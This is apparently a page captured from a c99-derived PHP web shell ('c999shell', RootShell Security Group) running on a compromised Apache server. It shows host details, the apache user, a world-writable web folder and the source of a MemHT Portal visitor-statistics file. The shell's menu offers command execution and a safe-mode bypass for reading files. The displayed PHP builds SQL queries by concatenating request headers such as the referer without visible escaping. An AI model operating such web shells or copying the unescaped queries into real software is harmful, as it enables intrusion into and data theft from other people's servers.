Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/alumni/inc/ drwxrwxrwx |
Viewing file: Select action/file-type: <?php /******************************************************************************** - MemHT Portal - Copyright (C) 2007-2008 by Miltenovik Manojlo http://www.memht.com This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your opinion) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2) or write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA02110-1301, USA. ********************************************************************************/ if (stristr(htmlentities($_SERVER['PHP_SELF']), "inc_getinfo.php")) { die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>"); } global $dblink,$visitorInfo,$tzNOW,$page,$userid,$userInfo; setcookie("testcookie",time(),time()+3600); //1hour $visitorInfo['cookies_on'] = (isset($_COOKIE['testcookie'])) ? 1 : 0 ; //Today $row = $dblink->get_row("SELECT DATE_FORMAT($tzNOW,'%Y-%m-%d') as today"); $siteInfo['sdate'] = $row['today']; //User Agent $visitorInfo['agent'] = inCode($_SERVER['HTTP_USER_AGENT']); //Block automated hack scripts if (eregi("libwww-perl",$visitorInfo['agent'])) { die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Access Denied:</b> I don't like bots.</td></tr></table>"); } //Referer if (isset($_SERVER['HTTP_HOST']) AND isset($_SERVER['HTTP_REFERER'])) { $visitorInfo['referer'] = (!eregi($_SERVER['HTTP_HOST'],$_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : "" ; } else { $visitorInfo['referer'] = ""; } //Requested uri $visitorInfo['requesturi'] = inCode((($_SERVER['REQUEST_URI']!="/" AND $_SERVER['REQUEST_URI']!="/favicon.ico" AND $_SERVER['REQUEST_URI']!="/favicon.gif")) ? $_SERVER['REQUEST_URI'] : "" ); //Is spider? $visitorInfo['is_spider'] = ($dblink->get_num("SELECT spidname FROM memht_spider_ranges WHERE '".ip2num($visitorInfo['ip'])."' BETWEEN fromip AND toip LIMIT 1")>0) ? true : false ; //Ignore in statistics? $visitorInfo['ignoreinstats'] = ($dblink->get_num("SELECT id FROM memht_statistics_ignore WHERE ip='".$visitorInfo['ip']."' OR user='".$userInfo['user']."'")>0) ? true : false ; if (!$visitorInfo['is_spider']){ //Home tracking if (!eregi("admin.php",$_SERVER['PHP_SELF'])) { $isbot = (eregi("bot|crawl|krawl|spiderfetch|script|search|engine|hunter|http|www|rss|email|curl|dillo|software|archive|java|urllib",$visitorInfo['agent'])) ? true : false; $dblink->query("INSERT INTO memht_statistics_livedata (id,date,ip,user,page,agent,referer,requesturi,isbot,cookies) VALUES (null,$tzNOW,'".$visitorInfo['ip']."','".$userInfo['user']."','$page','".$visitorInfo['agent']."','".$visitorInfo['referer']."','".$visitorInfo['requesturi']."','$isbot','".$visitorInfo['cookies_on']."')"); } else { $dblink->query("INSERT INTO memht_statistics_administration (id,date,ip,admin,page,agent,referer,requesturi) VALUES (null,$tzNOW,'".$visitorInfo['ip']."','".$userInfo['user']."','$page','".$visitorInfo['agent']."','".$visitorInfo['referer']."','".$visitorInfo['requesturi']."')"); } } else { //Spiders tracking $dblink->query("INSERT INTO memht_statistics_spiders (lastvisit,ip,agent,hits) VALUES ($tzNOW,'".$visitorInfo['ip']."','".$visitorInfo['agent']."','1') ON DUPLICATE KEY UPDATE hits=hits+1,lastvisit=$tzNOW"); } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |